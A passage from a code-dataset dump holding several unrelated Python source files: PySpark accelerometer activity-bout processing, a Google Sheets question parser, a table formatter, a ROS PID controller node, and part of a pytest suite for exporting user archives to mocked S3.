row\n\n\ndef query_fyi(session, number):\n row = session.query(Fyi).\\\n filter(Fyi.id == number).\\\n one_or_none()\n return row\n","repo_name":"lafrenierejm/ietf-cli","sub_path":"ietf/utility/query_doc.py","file_name":"query_doc.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"10705832440","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql import functions as F\nfrom datetime import datetime, timedelta\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.types import TimestampType\nfrom pyspark.sql.types import IntegerType\nimport datefinder\nimport time\n\n##########################################################################################################\n\ndef queryrows(df, string):\n \"\"\"\n Select the rows which match a given string.\n\n :param df:\n Spark DataFrame object containing the accelerometer raw data\n :param string:\n matching string\n :return:\n Spark DataFrame object with filtered values\n \"\"\"\n\n filter_value = df.schema.names[0] + \" like '%\" + string + \"%'\"\n\n return df.filter(filter_value).collect()[0][0]\n\n\n##########################################################################################################\n\ndef gen_acc_dataframe(df, ts_name):\n \"\"\"\n Generate accelerometer DataFrame from raw data with timestamp column.\n\n :param df:\n Spark DataFrame object containing the accelerometer raw data\n :param ts_name:\n name of timestamp column\n :return:\n input data epoch, Spark DataFrame object with timestamp data\n \"\"\"\n\n ## extract metadata from RDD object\n start_date = queryrows(df, 'Start Date').split()[2]\n start_time = queryrows(df, 'Start Time').split()[2]\n interval = queryrows(df, 'Period').split()[3]\n dateformat = queryrows(df, 'Data File Created By').split()\n\n if len(dateformat) < 14:\n\n dt = datefinder.find_dates(start_date + \" \" + start_time)\n start_timestamp = [ts for ts in dt][0]\n\n else:\n\n date_dict = {'M/d/yyyy': ['%m/%d/%Y', '%m/%d/%Y'],\n 'dd-MMM-yy': ['%d/%m/%Y', '%d-%b-%y'],\n 'dd-MM-yyyy': ['%d/%m/%Y', '%d-%m-%Y'],\n 'dd/MM/yyyy': ['%d/%m/%Y', '%d/%m/%Y']\n }\n\n dt = dateformat[13]\n datetime_format = [date_dict[dt][0] + ' %H:%M:%S', date_dict[dt][1] + ' %H:%M:%S']\n start_timestamp = datetime.strptime(start_date + \" \" + start_time, datetime_format[0])\n\n x = time.strptime(interval, '%H:%M:%S')\n\n interval_sec = timedelta(hours=x.tm_hour, minutes=x.tm_min, seconds=x.tm_sec)\n\n ## extract accelerometer data from RDD object\n acc_data = df.filter(\"not value like '%Current%'\")\n acc_data = acc_data.filter(\"not value like '%Axis%'\")\n acc_data = acc_data.filter(\"value like '%,%'\") # TODO: change 'value' as 'df.schema.names[0]'\n acc_data = acc_data.cache()\n acc_data = acc_data.checkpoint()\n acc_data.count()\n acc_data = acc_data.selectExpr('value as acc_data') # change column name to 'acc_data'\n acc_data = acc_data.withColumn('id', F.monotonically_increasing_id())\n\n app_fun = F.udf(lambda k: start_timestamp + k * interval_sec, TimestampType())\n\n acc_data = acc_data.withColumn(ts_name, app_fun(acc_data['id'])).select([ts_name, 'acc_data'])\n\n return interval_sec.seconds, acc_data\n\n\n##########################################################################################################\n\ndef split_acc_data(df, col_list):\n \"\"\"\n Reads string of data from accelerometer DataFrame.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param col_list:\n list of feature names matching accelerometer data\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df = df.cache()\n df = df.checkpoint()\n df.count()\n\n cols = F.split(df['acc_data'], r',')\n\n for k, item in enumerate(col_list):\n df = df.withColumn(item, cols.getItem(k).cast(dataType=IntegerType()))\n\n df = df.drop('acc_data')\n\n return df\n\n\n##########################################################################################################\n\ndef activity_count(df, datetime_col, interval, LightCO, ModerateCO, HardCO, VeryHardCO, incl_acc=False):\n \"\"\"\n Return activity count calculated from accelerometer data.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param datetime_col:\n column with timestamp data\n :param interval:\n epoch duration (in seconds)\n :param LightCO:\n light activity cutoff value\n :param ModerateCO:\n moderate activity cutoff value\n :param HardCO:\n hard activity cutoff value\n :param VeryHardCO:\n very hard activity cutoff value\n :param incl_acc:\n if true, all raw accelerometer data are included in the DataFrame\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df = df.cache()\n df = df.checkpoint()\n df.count()\n\n cols = df.columns\n\n app_fun = F.udf(lambda x: activity_index(x, interval, LightCO, ModerateCO, HardCO, VeryHardCO))\n\n ## use the axis1 or vectMag to determine the activity count\n df = df.withColumn('activity', F.col(cols[1]))\n\n df = df.withColumn('activityIntensity', app_fun(df['activity'])).orderBy(datetime_col)\n\n cols.insert(1, 'activity')\n\n cols.insert(2, 'activityIntensity')\n\n if not incl_acc:\n\n df = df.select(cols[0:3]).orderBy(datetime_col)\n\n else:\n\n df = df.select(cols).orderBy(datetime_col)\n\n return df\n\n\n##########################################################################################################\n\ndef activity_index(AC, interval, LightCO, ModerateCO, HardCO, VeryHardCO):\n \"\"\"\n Calculate activity intensity level using Freedson adult cut points (Freedson, Melanson, & Sirard, 1998).\n\n :param AC:\n activity count per epoch\n :param interval:\n epoch duration (in seconds)\n :param LightCO:\n light activity cutoff value\n :param ModerateCO:\n moderate activity cutoff value\n :param HardCO:\n hard activity cutoff value\n :param VeryHardCO:\n very hard activity cutoff value\n :return:\n integer value corresponding to the activity intensity\n \"\"\"\n\n ## assume epoch smaller than 1 minute\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n\n ## normalize the cutoffs per epoch\n n = 60 / interval\n VeryHardCO = VeryHardCO / n\n HardCO = HardCO / n\n ModerateCO = ModerateCO / n\n LightCO = LightCO / n\n\n if AC == -1:\n act_index = -1 # state unknown\n elif AC == -2:\n act_index = -2 # not wearing device\n elif 0 <= AC < LightCO:\n act_index = 0 # sedentary\n elif LightCO <= AC < ModerateCO:\n act_index = 1 # light activity\n elif ModerateCO <= AC < HardCO:\n act_index = 2 # moderate activity\n elif HardCO <= AC < VeryHardCO:\n act_index = 3 # hard activity\n else:\n act_index = 4 # very hard activity\n\n return act_index\n\n\n##########################################################################################################\n### NOT USED ###\ndef datetime_filter(df, param_name, param_value, datetime_name, time_w=90, step=90 * 60):\n \"\"\"\n Remove rows in DataFrame which match a condition within a given time interval.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param param_name:\n parameter name\n :param param_value:\n parameter value for conditional statement\n :param datetime_name:\n column with timestamp data\n :param time_w:\n tumbling window duration (in minutes)\n :param step:\n sliding interval (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## tumbling window size\n tw = str(time_w) + ' minutes'\n\n ## sliding window size\n sw = str(step) + ' seconds'\n\n ## offset (in seconds)\n offset = str(0) + ' seconds'\n\n intervals_df = df.groupBy(F.window(datetime_name, '{}'.format(tw), '{}'.format(sw), '{}'.format(offset))) \\\n .avg(param_name) \\\n .sort('window.start') \\\n .filter(F.col('avg({})'.format(param_name)) == param_value) \\\n .select('window') \\\n .withColumn('start', F.col('window').start) \\\n .withColumn('end', F.col('window').end) \\\n .drop('window')\n\n \"\"\"\n schema of internal_df:\n \n root\n |-- start: timestamp (nullable = true)\n |-- end: timestamp (nullable = true)\n \"\"\"\n\n ## transform dataframe into list of pyspark.sql.types.Row objects\n intervals_list = intervals_df.collect()\n\n ## filter dataframe excluding the selected intervals\n for row in intervals_list:\n df = df.filter(~F.col(datetime_name).between(row[0], row[1]))\n\n return intervals_df, df\n\n\n##########################################################################################################\n### NOT USED ###\ndef start_time_offset(df):\n \"\"\"\n Return the offset to start a tumbling window from the first timestamp of the DataFrame.\n\n :param df:\n Spark DataFrame object with timestamp data\n :return:\n number of seconds\n \"\"\"\n\n ## notice: the resulting offset must be smaller than the tumbling window\n st_date = df.first()[0]\n st_min = st_date.minute\n st_sec = st_date.second\n start_time = (st_min - 10 * (st_min // 10)) * 60 + st_sec\n offset = '{} seconds'.format(str(start_time))\n\n return offset\n\n\n##########################################################################################################\n\ndef consecutive_time(df, ts_name, interval):\n \"\"\"\n Add two columns with the start date and end date of consecutive timestamps which differ by a given interval.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param interval:\n required precision (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df_ = df.withColumn(\"rn\", F.row_number().over(Window.orderBy('{}'.format(ts_name))))\n\n df_ = df_.cache()\n df_ = df_.checkpoint()\n df_.count()\n\n df_.createOrReplaceTempView('df_')\n\n spark = SparkSession.builder.getOrCreate()\n\n df_ = spark.sql(\"\"\" WITH tmp AS(\n SELECT *, BIGINT({}) - rn * {} AS totsec\n FROM df_)\n SELECT *, MIN({}) OVER(PARTITION BY totsec) AS start, \n MAX({}) OVER(PARTITION BY totsec) AS end,\n ROW_NUMBER() OVER(PARTITION BY totsec ORDER BY {}) AS id\n FROM tmp\n \"\"\".format(ts_name, str(interval), ts_name, ts_name, ts_name)).drop('totsec').drop('rn')\n\n df_.createOrReplaceTempView('df_')\n\n df_ = spark.sql(\"\"\" SELECT *, BIGINT(start) - LAG(BIGINT(end),1,BIGINT(end)) OVER(ORDER BY timestamp) AS pause\n FROM df_\n \"\"\")\n\n return df_\n\n\n##########################################################################################################\n\ndef detect_bouts(df, ts_name, col_name, new_col, interval, UP, LOW, DURATION, TOL):\n \"\"\"\n Create a new column based on filters on timestamps.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param col_name:\n column on which the filter must be applied\n :param new_col:\n column with applied filters\n :param interval:\n epoch duration (in seconds)\n :param UP:\n upper limit of activity count per minute\n :param LOW:\n lower limit of activity count per minute\n :param DURATION:\n minimum bout duration (in minutes)\n :param TOL:\n tolerance (in minutes)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## assume one epoch smaller than 1 minute\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n\n ## number of epochs per minute\n n = 60 / interval\n\n ## bounds on measured quantitity per epoch\n up, low = (UP / n, LOW / n)\n\n ## convert tolerance in seconds\n tol = TOL * 60\n\n ## number of epoch in tolerance interval\n epochs_tol = tol / interval\n\n ## convert minimum bout duration in seconds\n duration = DURATION * 60\n\n ## Number of epochs in minimum bout duration\n epochs_min_bout = duration / interval\n\n ## filter dataframe with: low <= col_name <= up\n inbout = (F.col('{}'.format(col_name)) >= low) & (F.col('{}'.format(col_name)) <= up)\n df1 = df.filter(inbout).orderBy('{}'.format(ts_name))\n df1.checkpoint()\n\n ## determine consecutive timestamps in df1\n df1 = consecutive_time(df1, '{}'.format(ts_name), interval)\n df1 = df1.selectExpr(['{}'.format(ts_name), 'start as activity_start'])\n\n pause_list = 0\n\n if TOL > 0:\n ## filter data with col_name < low and col_name > up\n df2 = df.filter(~inbout).orderBy('{}'.format(ts_name))\n df2 = df2.cache()\n df2 = df2.checkpoint()\n df2.count()\n\n ## determine consecutive timestamps in df2\n df2 = consecutive_time(df2, '{}'.format(ts_name), interval)\n df2 = df2.selectExpr(['{}'.format(ts_name), 'start as pause_start'])\n\n ## filter periods larger than tolerance\n df2 = df2.groupBy('pause_start').count()\n df2 = df2.filter(df2['count'] > epochs_tol).orderBy('pause_start')\n df2 = df2.withColumn('pause_end', (F.col('pause_start').cast(IntegerType()) +\n (F.col('count') - 1) * interval).cast(TimestampType())\n ).drop('count')\n\n pause_list = df2.collect()\n\n ## merge df1 to the accelerometer dataframe\n df3 = df.join(df1, ['{}'.format(ts_name)], 'leftouter')\n df3.checkpoint()\n\n if TOL > 0:\n\n ## assign pause periods\n df3 = df3.withColumn('pause', F.lit(0))\n\n for row in pause_list:\n df3 = df3.withColumn('pause', F.when((F.col('{}'.format(ts_name)) >= row['pause_start']) &\n (F.col('{}'.format(ts_name)) <= row['pause_end']),\n 1).otherwise(F.col('pause'))\n )\n\n ## assign previous non-zero 'start' to missing values given 'pause' < tolerance\n df3 = df3.withColumn('activity_start', F.when((F.col('activity_start').isNull()) &\n (F.col('pause') == 0),\n F.last(F.col('activity_start'), ignorenulls=True)\n .over(Window.orderBy(ts_name))\n ).otherwise(F.col('activity_start'))\n ).drop('pause')\n\n ## define a flag to select rows with non-zero 'activity_start'\n df3 = df3.withColumn('check', F.when(F.col('activity_start').isNotNull(), F.lit(1)).otherwise(F.lit(0)))\n\n ## select rows with non-zero 'activity_start'\n df2 = df3.select(['{}'.format(ts_name), 'check']).filter(F.col('check') == 1)\n\n ## assign bout start\n df2 = consecutive_time(df2, '{}'.format(ts_name), interval).selectExpr(\n ['{}'.format(ts_name), 'start as bout_start'])\n\n ## assign bout to dataframe\n df3 = df3.join(df2, ['{}'.format(ts_name)], 'leftouter').drop(*['activity_start', 'check'])\n\n df3 = df3.withColumn('bout_start', F.when(F.col('bout_start').isNull(),\n F.col(ts_name)\n ).otherwise(F.col('bout_start'))\n )\n\n ## filter periods larger than the minimum bout duration\n df1 = df3.groupBy('bout_start').count()\n df1.checkpoint()\n\n df1 = df1.filter(df1['count'] > epochs_min_bout).orderBy('bout_start')\n\n df1 = df1.withColumn('bout_end', (F.col('bout_start').cast(IntegerType()) +\n F.col('count') * interval).cast(TimestampType())\n ).drop('count')\n\n df1 = df1.withColumn(new_col, F.row_number().over(Window.orderBy('bout_start')))\n\n bouts_list = df1.collect()\n\n ## initialize activityBoutNumber to zero\n df3 = df3.drop(*['start', 'end', 'check', 'pause', 'bout_start'])\n\n df3 = df3.withColumn(new_col, F.lit(0))\n\n df3.checkpoint()\n\n ## assign activityBoutNumber\n for row in bouts_list:\n df3 = df3.withColumn(new_col, F.when((F.col('{}'.format(ts_name)) >= row['bout_start']) &\n (F.col('{}'.format(ts_name)) <= row['bout_end']),\n row[new_col]\n ).otherwise(F.col(new_col))\n )\n\n df3 = df3.orderBy('{}'.format(ts_name))\n\n return df3\n\n\n##########################################################################################################\n\ndef select_acc_intervals(df, ts_name, interval, window, incl_vect=False, incl_acc=False):\n \"\"\"\n Filter DataFrame with a new epoch duration.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param interval:\n initial epoch duration (in seconds)\n :param window:\n new epoch duration (in seconds)\n :param incl_vect:\n if true, calculate vector magnitude and include it in the DataFrame\n :param incl_acc:\n if true, all raw accelerometer data are included in the DataFrame\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## the window must be larger tha a single epoch\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n assert window >= interval, \"Window smaller than epoch.\"\n\n cols = df.columns\n selected_cols = ['axis1', 'axis2', 'axis3', 'steps'] # TODO: add eeAccumulator\n\n minp = df.select(F.min(ts_name).cast('long')).first()[0]\n\n if interval < window:\n\n df2 = df.withColumn('tmp', F.row_number().over(Window.orderBy(ts_name)) - 1)\n\n df2 = df2.withColumn('total_sec', F.col(ts_name).cast('long')).cache()\n df2 = df2.checkpoint()\n df2.count()\n\n for col in selected_cols:\n\n df2 = df2.withColumn(col, F.when(((F.col('total_sec') - minp) % window == 0),\n F.sum(col).over(Window.orderBy('total_sec')\n .rangeBetween(0, window - interval)\n )\n ).otherwise(0)\n )\n\n df2 = df2.withColumn('duration', F.col(ts_name).cast(IntegerType()) -\n F.lag(F.col(ts_name).cast(IntegerType()), 1, minp)\n .over(Window.orderBy(ts_name))\n ).drop('total_sec')\n\n df2 = df2.withColumn('tmp', (F.col('tmp') * F.col('duration')) % window).drop('duration').orderBy(ts_name)\n\n df2 = df2.filter(F.col('tmp') == 0).drop('tmp').orderBy(ts_name)\n\n else:\n\n df2 = df\n\n if incl_vect:\n\n df2 = df2.withColumn('vectMag', F.sqrt(F.col('axis1') ** 2 + F.col('axis2') ** 2 + F.col('axis3') ** 2))\n\n cols.insert(1, 'vectMag')\n\n df2 = df2.select(cols).orderBy(ts_name)\n\n if not incl_acc:\n\n df2 = df2.select(ts_name, cols[1])\n\n return df2\n\n\n##########################################################################################################\n\ndef non_wear_filter(df, ts_name, AC_name, AI_name, interval, DURATION):\n \"\"\"\n Determine non-wearing period, for which activity count and activity intensity are assigned equal to -2.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param AC_name:\n column with activity count values\n :param AI_name:\n column with activity intensity values\n :param interval:\n epoch duration (in seconds)\n :param DURATION:\n non-wearing period (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## select valid epochs with non-negative activity count\n df1 = df.filter(F.col(AC_name) >= 0)\n\n df1 = df1.cache()\n df1 = df1.checkpoint()\n df1.count()\n\n TOL = 0\n\n UP = 0\n\n LOW = 0\n\n new_col = 'no_wear'\n\n df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n df1 = df1.select([ts_name, new_col])\n\n ## merge new column with the DataFrame and assing zero to missing values\n df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n df2 = df2.cache()\n df2 = df2.checkpoint()\n df2.count()\n\n ## assign activity count and activity intensity equal to -2 for non valid data\n df2 = df2.withColumn(AC_name, F.when(F.col(new_col) > 0, -2).otherwise(F.col(AC_name)))\n\n df2 = df2.withColumn(AI_name, F.when(F.col(new_col) > 0, -2).otherwise(F.col(AI_name))).drop(new_col)\n\n return df2\n\n\n##########################################################################################################\n\ndef activity_bout_filter(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL):\n \"\"\"\n Detect activity bouts.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param AC_name:\n column with activity count values\n :param new_col:\n column with applied filters\n :param interval:\n epoch duration (in seconds)\n :param UP:\n upper limit of activity count per minute\n :param LOW:\n lower limit of activity count per minute\n :param DURATION:\n minimum bout duration (in minutes)\n :param TOL:\n tolerance (in minutes)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## select valid epochs with non-negative activity count\n df1 = df.filter(F.col(AC_name) >= 0)\n\n df1 = df1.cache()\n df1 = df1.checkpoint()\n df1.count()\n\n df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n df1 = df1.select([ts_name, new_col])\n\n ## merge new column with the dataframe and assing zero to missing values\n df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n return df2\n\n\n##########################################################################################################\n\ndef sedentary_bout_filter(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL):\n \"\"\"\n Detect sedentary bouts.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param AC_name:\n column with activity count values\n :param new_col:\n column with applied filters\n :param interval:\n epoch duration (in seconds)\n :param UP:\n upper limit of activity count per minute\n :param LOW:\n lower limit of activity count per minute\n :param DURATION:\n minimum bout duration (in minutes)\n :param TOL:\n tolerance (in minutes)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## select valid epochs with non-negative activity count\n df1 = df.filter(F.col(AC_name) >= 0)\n\n df1 = df1.cache()\n df1 = df1.checkpoint()\n df1.count()\n\n df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n df1 = df1.select([ts_name, new_col])\n\n ## merge new column with the dataframe and assing zero to missing values\n df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n return df2\n\n##########################################################################################################\n","repo_name":"emolinaro/PALMSpy","sub_path":"src/AccProcessing.py","file_name":"AccProcessing.py","file_ext":"py","file_size_in_byte":23607,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"8097923076","text":"import pygsheets\nfrom secret import secret\nimport os\n\nclass QuestionParse:\n def __init__(self):\n self.file = pygsheets.authorize(client_secret=os.path.join(os.getcwd(), '/secret/credit.json'))\n self.file = self.file.open_by_key(secret.file_id)\n self.table = self.file.worksheet('index', 0)\n\n # if flag == True, then all values are parsed,\n # if flag == False, then the function will return only new values\n def __parse(self, flag: bool):\n array = self.table.get_all_values(returnas='matrix')\n array = list(filter(\n lambda x: (x[0] != '') and ((str(x[6]).replace(\" \", \"\") not in {'Обработан', 'обработан'}) or flag), array)\n )\n return array\n\n def __prepare_string(self, array):\n array = array[1::]\n result = \"сообщения в количестве {} штук \\n\".format(len(array))\n iteration_str = \"Время: {} \\n\" \\\n \"ФИО: {} \\n\" \\\n \"Почта: {} \\n\" \\\n \"Курс: {} \\n\" \\\n \"Группа: {} \\n\" \\\n \"Вопрос: {} \\n\" \\\n \"---------------\\n\"\n for val in array:\n result += iteration_str.format(\n val[0],\n val[1],\n val[2],\n val[3],\n val[4],\n val[5]\n )\n\n return result\n\n def get_new_messages(self):\n array = self.__parse(False)\n if len(array) < 2:\n return \"Нет новых сообщений\"\n return \"Новые \" + self.__prepare_string(array)\n\n def get_all_messages(self):\n array = self.__parse(True)\n return \"Все \" + self.__prepare_string(array)\n","repo_name":"vgtstptlk/question_bot","sub_path":"QuestionParse.py","file_name":"QuestionParse.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"12366361212","text":"#!/usr/bin/env python\n\nimport locale\nimport sys\nimport six\n\n\n# Below causes issues in some locales and noone knows why it was included so commenting out for now\n# locale.setlocale(locale.LC_NUMERIC, \"\")\n\n\nclass Table:\n def format_num(self, num):\n \"\"\"Format a number according to given places.\n Adds commas, etc. Will truncate floats into ints!\"\"\"\n\n try:\n if \".\" in num:\n inum = float(num)\n return locale.format(\"%.2f\", (0, inum), True)\n else:\n inum = int(num)\n return locale.format(\"%.*f\", (0, inum), True)\n\n except (ValueError, TypeError):\n return str(num.encode('utf-8')) if isinstance(num, six.string_types) else str(num)\n\n def get_max_width(self, table, index):\n \"\"\"Get the maximum width of the given column index\"\"\"\n return max([len(self.format_num(row[index])) for row in table])\n\n def pprint_table(self, table):\n \"\"\"Prints out a table of data, padded for alignment\n @param table: The table to print. A list of lists.\n Each row must have the same number of columns. \"\"\"\n col_paddings = []\n\n out = \"\"\n for i in range(len(table[0])):\n col_paddings.append(self.get_max_width(table, i))\n\n for row in table:\n # left col\n out += str(row[0]).ljust(col_paddings[0] + 1)\n # rest of the cols\n for i in range(1, len(row)):\n col = self.format_num(row[i]).rjust(col_paddings[i] + 2)\n out += col\n out += \"\\n\"\n\n return out\n\n\nif __name__ == \"__main__\":\n T = Table()\n T.bumppath = '/home/jmht/ample-dev1/examples/toxd-example/ROSETTA_MR_3/MRBUMP/cluster_run1'\n T.cluster = True\n table = T.maketable()\n out = sys.stdout\n T.pprint_table(out, table)\n","repo_name":"rigdenlab/ample","sub_path":"ample/util/printTable.py","file_name":"printTable.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"} +{"seq_id":"74328269543","text":"#!/usr/bin/env python\n\"\"\"\nThe `pid.py` module is a Python implementation of a\nProportional-Integral-Derivative controller for ROS. By default, it listens on\na topic \"desired\" for the current set point and a topic \"state\" for the current\nstate of the plant being controller. It then writes to a topic \"cmd\" with the\noutput of the PID controller. If the parameter `variable` is defined, these\ntopics will be renamed as follows. This makes it easy to integrate this PID\ncontroller with ROS topics from firmware modules without remapping each of the\ntopics individually.\n\n desired -> /desired\n state -> /measured\n cmd -> /commanded\n\nIt also reads configuration from a number of other ROS parameters as well. The\ncontroller gains are passed in as parameters `Kp`, `Ki`, and `Kd`. It also\naccepts an `upper_limit` and `lower_limit` to bound the control effort output.\n`windup_limit` defines a limit for the integrator of the control loop.\n`deadband_width` can be used to apply a deadband to the control effors.\nSpecifically, commands with absolute value less than `deadband_width` will be\nchanged to 0.\n\"\"\"\nimport rospy\nfrom std_msgs.msg import Float64, String\n\nclass PID:\n \"\"\" Discrete PID control \"\"\"\n def __init__(self, Kp=0, Ki=0, Kd=0, upper_limit=1, lower_limit=-1,\n windup_limit=1000, deadband_width=0):\n self.Kp = Kp\n self.Ki = Ki\n self.Kd = Kd\n self.upper_limit = upper_limit\n self.lower_limit = lower_limit\n self.windup_limit = windup_limit\n self.deadband_width = deadband_width\n\n self.set_point = None\n self.last_error = 0\n self.integrator = 0\n\n def update(self, state):\n # If setpoint was made null, or was already null, do nothing.\n if self.set_point is None:\n return\n\n error = self.set_point - state\n\n if abs(error) < self.deadband_width:\n return 0\n\n p_value = self.Kp * error\n d_value = self.Kd * (error - self.last_error)\n self.last_error = error\n self.integrator = self.integrator + error\n self.integrator = max(-self.windup_limit, min(self.windup_limit, self.integrator))\n i_value = self.Ki * self.integrator\n\n res = p_value + i_value + d_value\n res = min(self.upper_limit, max(self.lower_limit, res))\n\n return res\n\nif __name__ == '__main__':\n rospy.init_node('pid')\n\n # Make sure that we're under an environment namespace.\n namespace = rospy.get_namespace()\n if namespace == '/':\n raise RuntimeError(\n \"Cannot be run in the global namespace. Please \"\n \"designate an environment for this module.\"\n )\n\n param_names = [\n \"Kp\", \"Ki\", \"Kd\", \"lower_limit\", \"upper_limit\", \"windup_limit\",\n \"deadband_width\"\n ]\n param_values = {}\n for param_name in param_names:\n private_param_name = \"~\" + param_name\n if rospy.has_param(private_param_name):\n param_values[param_name] = rospy.get_param(private_param_name)\n\n pid = PID(**param_values)\n\n pub_name = \"cmd\"\n state_sub_name = \"state\"\n desired_sub_name = \"desired\"\n\n variable = rospy.get_param(\"~variable\", None)\n if variable is not None:\n pub_name = \"{}/commanded\".format(variable)\n state_sub_name = \"{}/measured\".format(variable)\n desired_sub_name = \"{}/desired\".format(variable)\n\n pub = rospy.Publisher(pub_name, Float64, queue_size=10)\n\n def state_callback(item):\n cmd = pid.update(item.data)\n if cmd is None:\n return\n pub.publish(cmd)\n\n def set_point_callback(item):\n pid.set_point = item.data\n\n # When we receive the recipe end message, reset this PID controller to its default values.\n # This disables the set point so the controller will just idle until it is set by a new recipe.\n def recipe_end_callback(item):\n pid = PID(**param_values)\n pid.set_point = None\n\n recipe_end_topic = \"{ns}recipe_end/desired\".format(ns=rospy.get_namespace())\n recipe_end_sub = rospy.Subscriber(recipe_end_topic, String, recipe_end_callback)\n state_sub = rospy.Subscriber(state_sub_name, Float64, state_callback)\n set_point_sub = rospy.Subscriber(\n desired_sub_name, Float64, set_point_callback\n )\n\n rospy.spin()\n","repo_name":"OpenAgricultureFoundation/openag_brain","sub_path":"nodes/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"36"} +{"seq_id":"15586536002","text":"import datetime\nimport io\nimport json\nimport os\nimport zipfile\nfrom unittest.mock import call\n\nimport boto3\nimport settings\nfrom moto import mock_s3\n\nimport pytest\nfrom userauth.services.export import ExportUserArchive\nfrom utils import hashid\n\npytestmark = pytest.mark.usefixtures('db_session')\n\n\nclass TestExportUserArchive:\n @pytest.fixture\n def user(self, user_factory):\n return user_factory.create()\n\n @pytest.fixture\n def export_user_archive(self, user) -> ExportUserArchive:\n return ExportUserArchive(user=user)\n\n @pytest.fixture\n def mocked_zip_file(self, mocker):\n zip_file_mock = mocker.MagicMock(spec=zipfile.ZipFile)\n mocker.patch(\"zipfile.ZipFile\", return_value=zip_file_mock)\n mocked_zip_file = zip_file_mock.__enter__.return_value = mocker.Mock()\n\n return mocked_zip_file\n\n @pytest.fixture\n def file_cleanup(self, user):\n hashed_user_id = hashid.encode(user.id)\n yield\n os.remove(f\"/tmp/{hashed_user_id}.zip\")\n\n def test_user_data_is_exported(self, user, export_user_archive):\n data = export_user_archive._export_user_data()\n assert data.get(\"user\") == json.dumps(\n {\n \"id\": user.id,\n \"profile\": {\n \"id\": user.profile.id,\n \"first_name\": user.profile.first_name,\n \"last_name\": user.profile.last_name,\n },\n \"email\": user.email,\n \"is_superuser\": user.is_superuser,\n \"is_active\": user.is_active,\n \"is_confirmed\": user.is_confirmed,\n \"created\": user.created.isoformat(),\n }\n )\n\n def test_crud_demo_items_data_is_exported(self, user, crud_demo_item_factory, export_user_archive):\n item = crud_demo_item_factory.create(created_by=user)\n data = export_user_archive._export_user_data()\n assert data.get(\"crud_demo_items\") == [json.dumps({\"id\": item.id, \"name\": item.name})]\n\n def test_document_demo_item_is_exported(self, user, document_demo_item_factory, export_user_archive):\n document = document_demo_item_factory.create(created_by=user)\n data = export_user_archive._export_user_files()\n assert document.file in data\n\n @mock_s3\n def test_zip_archive_is_created(self, user, document_demo_item_factory, mocked_zip_file, export_user_archive):\n s3 = boto3.client(\"s3\", region_name='us-east-1', endpoint_url=settings.AWS_S3_ENDPOINT_URL)\n s3.create_bucket(Bucket=settings.AWS_STORAGE_BUCKET_NAME)\n document_item = document_demo_item_factory.create()\n user_data = {\"user\": \"data\"}\n document_content = b\"content\"\n with io.BytesIO() as document_file:\n document_file.write(document_content)\n document_file.seek(0)\n s3.upload_fileobj(document_file, settings.AWS_STORAGE_BUCKET_NAME, document_item.file)\n hashed_user_id = hashid.encode(user.id)\n\n archive_file_path = export_user_archive._export_user_archive_to_zip(\n user_data=user_data, user_files=[document_item.file]\n )\n\n assert archive_file_path == f\"/tmp/{hashed_user_id}.zip\"\n assert [\n call.writestr(f'{hashed_user_id}/{hashed_user_id}.json', json.dumps(user_data).encode('utf-8')),\n call.writestr(f'{hashed_user_id}/{document_item.file}', document_content),\n ] in mocked_zip_file.mock_calls\n\n @pytest.mark.usefixtures('file_cleanup', 's3_exports_bucket')\n @pytest.mark.freeze_time\n def test_user_archive_export_url_is_generated(self, user, export_user_archive):\n timestamp = datetime.datetime.now().strftime(\"%d-%m-%y_%H-%M-%S\")\n expected_obj_key = f\"exports/{hashid.encode(user.id)}_{timestamp}.zip\"\n\n export_url = export_user_archive.run()\n\n assert settings.AWS_EXPORTS_STORAGE_BUCKET_NAME in export_url\n assert expected_obj_key in 